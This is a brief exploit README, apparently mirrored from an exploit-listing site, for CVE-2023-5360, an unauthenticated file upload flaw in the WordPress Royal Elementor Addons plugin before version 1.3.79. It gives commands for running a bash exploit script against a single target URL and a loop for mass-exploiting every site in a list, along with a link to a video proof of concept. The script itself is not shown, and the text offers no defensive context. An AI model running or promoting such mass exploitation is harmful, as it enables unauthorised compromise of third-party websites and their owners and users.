Share
## https://sploitus.com/exploit?id=4BEE0967-3AB1-5CA4-9939-FAA640473AE2
# CVE-2023-5360 Exploit/POC

Exploit for the unauthenticated file upload vulnerability in WordPress's Royal Elementor Addons and Templates plugin (< 1.3.79). CVE-ID: CVE-2023-5360. 

## usage
#### single 
```
bash CVE_2023_5360.sh https://target.com
```

#### mass
```
while read sites; do bash CVE_2023_5360.sh $sites; done < yours_list.txt
```

## POC vd
https://shorturl.at/ioV35